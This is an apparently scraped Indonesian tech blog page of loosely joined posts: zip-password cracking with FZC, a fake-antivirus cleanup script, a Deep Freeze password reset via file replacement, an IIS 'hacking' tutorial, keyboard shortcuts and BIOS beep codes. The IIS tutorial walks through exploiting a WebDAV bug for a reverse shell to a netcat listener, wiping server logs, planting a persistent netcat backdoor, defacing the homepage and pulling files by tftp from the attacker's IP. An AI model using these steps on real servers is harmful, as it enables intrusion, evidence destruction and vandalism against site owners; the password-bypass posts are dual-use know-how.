But if you want to resume a wordlist attack you'll need to start a new wordlist attack, saying where it's gonna start. So if you ended the attack to the file.zip in line 100 using wordlist.txt in mode 3 to resume you'll type

fzc -mw3 -nzfile.zip -nwwordlist.txt -f100

Doing this FZC would start in line 100, since the others 99 lines where already checked in an earlier FZC session.

Well, it looks like I covered most of what you need to know. I certainly hope it helped you... don't forget to read the files that come with the program


Source: 1001 Hacking


Bookmark and Share



2
Membersihkan Antivirus Palsu XP Antispyware

.
Sudah banyak sekali antivirus palsu yang menyebar di internet dan sudah menginfeksi banyak sekali komputer di indonesia, untuk melihat daftar sebagian antivirus palsu tersebut bisa dilihat di sini,menurut data daru vaksin.com sudah ada 304 antivirus palsu yang beredar yang sebenarnya antivirus palsu tersebut adalah spyware yang menyerang komputer yang di tempatinya terinstal, salah satu dari antivirus palsu tersebut adalah Xp Antispyware 2009, untuk mengatasinya ada beberapa langkah

Untuk membersihkannya, ada beberapa langkah yang perlu dilakukan.
Berikut ini caranya:

1. Putuskan hubungan komputer yang akan dibersihkan dari jaringan.
2. Scan komputer Anda dengan menggunakan removal tool. Anda dapat menggunakan removal tool dari Norman untuk membersihkannya.

3. Hapus string registry yang telah dibuat oleh virus. Untuk mempermudah dapat menggunakan script registry dibawah ini.

[Version]
Signature="$Chicago$"
Provider=Vaksincom Oyee

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe ""%1"""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKCU, Software\Microsoft\Internet Explorer\Main, Search Bar, 0
HKCU, Software\Microsoft\Internet Explorer\Main, Search Page, 0
HKCU, Software\Microsoft\Internet Explorer\Main, Start Page, 0
HKLM, SOFTWARE\Microsoft\Internet Explorer\Main, Default_Search_URL, 0
HKLM, SOFTWARE\Microsoft\Internet Explorer\Main, Search Page, 0
HKLM, SOFTWARE\Microsoft\Internet Explorer\Main, Start Page, 0
HKLM, SOFTWARE\Microsoft\Internet Explorer\Search, SearchAssistant, 0
HKLM, SOFTWARE\Microsoft\Security Center, AntiVirusDisableNotify, 0
HKLM, SOFTWARE\Microsoft\Security Center, FirewallDisableNotify, 0
HKLM, SOFTWARE\Microsoft\Security Center, UpdateDisableNotify, 0
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, AppInit_DLLs, 0
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Run, braviax
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, braviax
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, brastk
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2, {706ab86c-937e-11dd-a04c-000c290bc510}
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executions Options, Explorer.exe

Gunakan notepad, kemudian simpan dengan nama "Repair.inf" (gunakan pilihan Save As Type menjadi All Files agar tidak terjadi kesalahan). Jalankan repair.inf dengan klik kanan, kemudian pilih install. Sebaiknya membuat file repair.inf di komputer yang clean, agar virus tidak aktif kembali.

4. Untuk pembersihan yang optimal dan mencegah infeksi ulang, sebaiknya gunakan antivirus yang terupdate dan mengenali seluruh file instalasi virus ini dengan baik.

Source: jatimcrew

Bookmark and Share


1
ANTI DEFREZE

.
Deep Freeze adalah salah satu program "pengaman" yang paling populer di warnet. Program ini memang cukup powerfull dalam menghadapi virus maupun tingkah laku usil pengunjung warnet. Apapun perubahan yang dilakukan oleh virus maupun pengunjung akan dikembalikan seperti kondisi semula oleh DF.

Sayangnya karena terlena oleh kemudahan ini, beberapa admin warnet kadang jadi lupa dengan password DF, akibatnya admin kebingungan ketika hendak menginstall program baru karena program tersebut akan ditendang lagi oleg Deep Freeze.

Berikut ini salah satu cara untuk mereset password DeepFreeze yang sudah saya coba dengan DF 5 dan DF 6.


Untuk DF 5 :

1. Install Df di kompie lain yang tidak terproteksi dengan DF. Set passwordnya sesuka anda. Agar saat ini rekan-rekan dengan saya, kita anggap saja password barunya adalah "bakmi"(tanpa tanda kutip).

2.Untuk DF 5, password DF tersebut disimpan di file bernama Persi0.sys yang terletak di drive C

Cara mereset passwordnya logikanya lumayan gampang seh : Kita replace saja file persi0.sys lama yang passwordnya kita lupa dengan file persi0.sys baru yang tentu saja passwordnya kita tahu karena baru saja kita buat.

3. hanya saja sampe saat ini proses mereplace ini setahu saya ternyata nggak gampang-gampang amat karena belum ada yang bisa melakukan dalam normal windows. (Bagi rekan-rekan yang tahu caranya silakan memberi masukan ). File persi0.sys tidak mau ditindih dengan file persi0.sys baru dalam normal wondows karena terproteksi oleh DF yang sedang berjalan.

4. Karena file persi0.sys tidak bisa diganggu gugat dalam normal windows maka kita terpaksa mencari cara lain. Anda bisa mencoba memakai sistem operasi lain, sistem operasi portabel, dan sebagainya untuk mereplace file persi0.sys. Tetapi saya pribadi cukup puas dengan memakai Recovery Consol milik Windows XP Prof Edition.

5. Anggap saja kita memakai CD Windows XP Professional untuk masuk DOS versi XP(Recovery Console Windows XP). Restart komputer. Set BIOS untuk boot lewat CD. Tekan enter untuk masuk CD Windows. Tunggu sampai muncul tulisan Windows XP Professional Setup. Muncul 3 pilihan : To Setup Windows XP Now, press Enter ; To repair a Windows XP installation using Recovery Console, press R ; To quit setup without installing Windows XP, press F3. Pilih/tekan R (to repair) untuk masuk ke dalam Recovery Console.

6. Isikan password admin anda. Bila dulu saat anda menginstall, tidak memasang password, tinggal tekan enter. Muncul prompt : C:Windows>

7.Copi file Persi0.sys dengan nama lain. Karena file Persi0.sys menyimpan password Bakmi, maka pada contoh ini file persi0.sys saya copi menjadi Bakmi.sys.

C:Windows> cd c: ---- pindah direktori ke C:

C:>copy persi0.sys Bakmi.sys ---- copi persi0.sys dengan nama lain

C:>exit ---- keluar

8. Masuk windows normal, copikan file Bakmi.sys di komputer teman anda tersebut ke dalam CD atau USB.

9. Selanjutnya masuk komputer anda yang DeepFreeze-nya terpassword. Copikan file bakmi.sys yang sudah anda buat ke dalam drive yang tidak diproteksi oleh DeepFreeze. Bila drive C diproteksi oleh DeepFreeze maka jangan masukkan bakmi.sys ke drive C, karena file ini akan dihapus oleh DeepFreeze. Anggap saja kita kopikan bakmi.sys ke drive D. Windows Recovery Console seperti cara sebelumnya. Rename file persi0.sys dengan nama lain. Copikan file bakmi.sys di drive D menjadi persi0.sys di drive C.

C:Windows>cd c: ----- pindah direktori

C:>ren persi0.sys Cp_persi0.sys ----- rename persi0.sys dengan nama lain

C:>copy d:Bakmi.sys c:persi0.sys ----- copy file baru menjadi persi0.sys

C:>exit

10. Masuk Windows, Masuk program DeepFreeze(konfigurasi) : Tekan Ctrl+Shift pada keyboard sambil mengklik icon DeepFreeze di Taskbar. Muncul kotak password. Isikan dengan password yang baru saja anda buat yaitu : Bakmi. Anda sudah bisa masuk file konfigurasi, tanpa perlu menginstall ulang DeepFreeze.Tanpa perlu install ulang windows.

Catatan :
Bila anda melakukan cara yang lebih ekstrim, seperti menghapus/merename file persi0.sys tanpa menggantikannya dengan file lain maka ada resiko system menjadi tidak stabil atau icon DeepFreeze-nya malah hilang dari Taskbar.

Ide-ide di atas bisa anda coba, bila DeepFreeze anda mengalami kerusakan sehingga meskipun anda ingat passwordnya tetapi program DeepFreeze itu sendiri hilang lenyap tidak tampak di Taskbar dan tidak bisa dipanggil. Kemungkinan besar ada file yang corrupt, bisa jadi file tersebut adalah file persi0.sys. Coba lakukan cara yang sama.


Untuk Deep Freeze versi 6 :

Caranya persis sama dengan Deep Freeze versi 5. Hanya saja untuk versi tertentu namanya lain yaitu $persi0.sys. Jadi kalau untuk DF versi 5 yang harus anda replace adalah file persi0.sys untuk DF versi 6 file yang harus anda replace adalah $persi0.sys (ada tambahan tanda dollar di depan).

Lha cara mereplacenya tentunya suka-suka anda, mau pake Linux, mau pake DOS, pake sistem oparasi portabel ya terserah situlah. Pada contoh ini saya cukup memanfaatkan Recovery Consolnya XP saja, karena nggak merasa butuh program lain.

Source: JatimCrew

Bookmark and Share


7
Hacking Dengan IIS

.
Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!

Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.

Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.

Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaa….aa

Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.

Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.

Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J

=> Mengeksploitasi celah keamanan dan Mengendalikan webserver

Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:

D:\nc>nc -Lvp 6666

Listening on [any] 6666 ….

Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.

D:\vcproject\webdave\debug>web.exe

[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]

www.coromputer.net && undernet #coromputer

syntax: D:\WEB.EXE [padding]

Cool !!! Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:

D:\vcproject\webdave\debug>web.exe 123.123.123.123 200.200.200.200 6666

Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.

D:\nc>nc -Lvp 6666

Listening on [any] 6666 ….

connect to 200.200.200.200 from 123.123.123.123

Microsoft(R) Windows 2000

(C)Copyright Microsoft Corp 1981-2000.

C:\winnt\system32>

Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.

=> Apa yang harus dilakuklansetelah melakukan hacking suatu server?

Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.

C:\winnt\system32> rmdir /s /q logfiles

Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.

Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.

Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.

Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:

C:\inetpub\wwwroot> copy index.html indexold.html

C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html

Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:

C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html

Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:

C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100

Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.

=> Kesimpulan

Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.

Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.

Source: BinusHacker.Net

Bookmark and Share


0
Best Keyboard Shortcuts

.
Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:
Windows key + R = Run menu

This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer

ALT + Tab = Switch between windows

ALT, Space, X = Maximize window

CTRL + Shift + Esc = Task Manager

Windows key + Break = System properties

Windows key + F = Search

Windows key + D = Hide/Display all windows

CTRL + C = copy

CTRL + X = cut

CTRL + V = paste

Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.


Keyboard Shortcuts

[Alt] and [Esc] Switch between running applications

[Alt] and letter Select menu item by underlined letter

[Ctrl] and [Esc] Open Program Menu

[Ctrl] and [F4] Close active document or group windows (does not work with some applications)

[Alt] and [F4] Quit active application or close current window

[Alt] and [-] Open Control menu for active document

Ctrl] Lft., Rt. arrow Move cursor forward or back one word

Ctrl] Up, Down arrow Move cursor forward or back one paragraph

[F1] Open Help for active application

Windows+M Minimize all open windows

Shift+Windows+M Undo minimize all open windows

Windows+F1 Open Windows Help

Windows+Tab Cycle through the Taskbar buttons

Windows+Break Open the System Properties dialog box



acessability shortcuts

Right SHIFT for eight seconds........ Switch FilterKeys on and off.

Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.

Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.

SHIFT....... five times Switch StickyKeys on and off.

NUM LOCK...... for five seconds Switch ToggleKeys on and off.

explorer shortcuts

END....... Display the bottom of the active window.

HOME....... Display the top of the active window.

NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.

NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.

NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.

LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.

RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.




Type the following commands in your Run Box (Windows Key + R) or Start Run

devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog


internetbrowser

type in u're adress "google", then press [Right CTRL] and [Enter]
add www. and .com to word and go to it


For Windows XP:

Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an item
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.

Use these keyboard shortcuts for dialog boxes:

To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE

If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:


Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U

accessibility keyboard shortcuts:

Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U

shortcuts you can use with Windows Explorer:


Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW


Bookmark and Share


1
Beep Codes Error Codes

.
After repeated requests for beep codes i have decided to post them here maybe they could be pinned

Standard Original IBM POST Error Codes
Code Description

1 short beep System is OK
2 short beeps POST Error - error code shown on screen No beep Power supply or system board problem Continuous beep Power supply, system board, or keyboard problem Repeating short beeps Power supply or system board problem
1 long, 1 short beep System board problem
1 long, 2 short beeps Display adapter problem (MDA, CGA)
1 long, 3 short beeps Display adapter problem (EGA)
3 long beeps 3270 keyboard card

IBM POST Diagnostic Code Descriptions
Code Description
100 - 199 System Board
200 - 299 Memory
300 - 399 Keyboard
400 - 499 Monochrome Display
500 - 599 Colour/Graphics Display
600 - 699 Floppy-disk drive and/or Adapter
700 - 799 Math Coprocessor
900 - 999 Parallel Printer Port
1000 - 1099 Alternate Printer Adapter
1100 - 1299 Asynchronous Communication Device, Adapter, or Port
1300 - 1399 Game Port
1400 - 1499 Colour/Graphics Printer
1500 - 1599 Synchronous Communication Device, Adapter, or Port
1700 - 1799 Hard Drive and/or Adapter
1800 - 1899 Expansion Unit (XT)
2000 - 2199 Bisynchronous Communication Adapter
2400 - 2599 EGA system-board Video (MCA)
3000 - 3199 LAN Adapter
4800 - 4999 Internal Modem
7000 - 7099 Phoenix BIOS Chips
7300 - 7399 3.5" Disk Drive
8900 - 8999 MIDI Adapter
11200 - 11299 SCSI Adapter
21000 - 21099 SCSI Fixed Disk and Controller
21500 - 21599 SCSI CD-ROM System

AMI BIOS Beep Codes
Code Description

1 Short Beep System OK
2 Short Beeps Parity error in the first 64 KB of memory
3 Short Beeps Memory failure in the first 64 KB
4 Short Beeps Memory failure in the first 64 KB Operational of memory
or Timer 1 on the motherboard is not functioning
5 Short Beeps The CPU on the motherboard generated an error
6 Short Beeps The keyboard controller may be bad. The BIOS cannot switch to protected mode
7 Short Beeps The CPU generated an exception interrupt
8 Short Beeps The system video adapter is either missing, or its memory is faulty
9 Short Beeps The ROM checksum value does not match the value encoded in the BIOS
10 Short Beeps The shutdown register for CMOS RAM failed
11 Short Beeps The external cache is faulty
1 Long, 3 Short Beeps Memory Problems
1 Long, 8 Short Beeps Video Card Problems

Phoenix BIOS Beep Codes
Note - Phoenix BIOS emits three sets of beeps, separated by a brief pause.

Code Description
1-1-3 CMOS read/write failure
1-1-4 ROM BIOS checksum error
1-2-1 Programmable interval timer failure
1-2-2 DMA initialisation failure
1-2-3 DMA page register read/write failure
1-3-1 RAM refresh verification failure
1-3-3 First 64k RAM chip or data line failure
1-3-4 First 64k RAM odd/even logic failure
1-4-1 Address line failure first 64k RAM
1-4-2 Parity failure first 64k RAM
2-_-_ Faulty Memory
3-1-_ Faulty Motherboard
3-2-4 Keyboard controller Test failure
3-3-4 Screen initialisation failure
3-4-1 Screen retrace test failure
3-4-2 Search for video ROM in progress
4-2-1 Timer tick interrupt in progress or failure
4-2-2 Shutdown test in progress or failure
4-2-3 Gate A20 failure
4-2-4 Unexpected interrupt in protected mode
4-3-1 RAM test in progress or failure>ffffh
4-3-2 Faulty Motherboard
4-3-3 Interval timer channel 2 test or failure
4-3-4 Time of Day clock test failure
4-4-1 Serial port test or failure
4-4-2 Parallel port test or failure
4-4-3 Math coprocessor test or failure
Low 1-1-2 System Board select failure
Low 1-1-3 Extended CMOS RAM failure


Bookmark and Share


0
Beep Code Manual

.
Better Than Gold Techies, American Megatrends Int. & Phoenix

(I'm IT, I use these codes to trouble shoot hardware issues at my job. Enjoy) cold.gif

BIOS Beep Codes

When a computer is first turned on, or rebooted, its BIOS performs a power-on self test (POST) to test the system's hardware, checking to make sure that all of the system's hardware components are working properly. Under normal circumstances, the POST will display an error message; however, if the BIOS detects an error before it can access the video card, or if there is a problem with the video card, it will produce a series of beeps, and the pattern of the beeps indicates what kind of problem the BIOS has detected.
Because there are many brands of BIOS, there are no standard beep codes for every BIOS.


The two most-used brands are AMI (American Megatrends International) and Phoenix.

Below are listed the beep codes for AMI systems, and here are the beep codes for Phoenix systems.


AMI Beep Codes

Beep Code Meaning
1 beep DRAM refresh failure. There is a problem in the system memory or the motherboard.
2 beeps Memory parity error. The parity circuit is not working properly.
3 beeps Base 64K RAM failure. There is a problem with the first 64K of system memory.
4 beeps System timer not operational. There is problem with the timer(s) that control functions on the motherboard.
5 beeps Processor failure. The system CPU has failed.
6 beeps Gate A20/keyboard controller failure. The keyboard IC controller has failed, preventing gate A20 from switching the processor to protect mode.
7 beeps Virtual mode exception error.
8 beeps Video memory error. The BIOS cannot write to the frame buffer memory on the video card.
9 beeps ROM checksum error. The BIOS ROM chip on the motherboard is likely faulty.
10 beeps CMOS checksum error. Something on the motherboard is causing an error when trying to interact with the CMOS.
11 beeps Bad cache memory. An error in the level 2 cache memory.
1 long beep, 2 short Failure in the video system.
1 long beep, 3 short A failure has been detected in memory above 64K.
1 long beep, 8 short Display test failure.
Continuous beeping A problem with the memory or video.
BIOS Beep Codes


Phoenix Beep Codes

Phoenix uses sequences of beeps to indicate problems. The "-" between each number below indicates a pause between each beep sequence. For example, 1-2-3 indicates one beep, followed by a pause and two beeps, followed by a pause and three beeps. Phoenix version before 4.x use 3-beep codes, while Phoenix versions starting with 4.x use 4-beep codes. Click here for AMI BIOS beep codes.
4-Beep Codes
Beep Code Meaning
1-1-1-3 Faulty CPU/motherboard. Verify real mode.
1-1-2-1 Faulty CPU/motherboard.
1-1-2-3 Faulty motherboard or one of its components.
1-1-3-1 Faulty motherboard or one of its components. Initialize chipset registers with initial POST values.
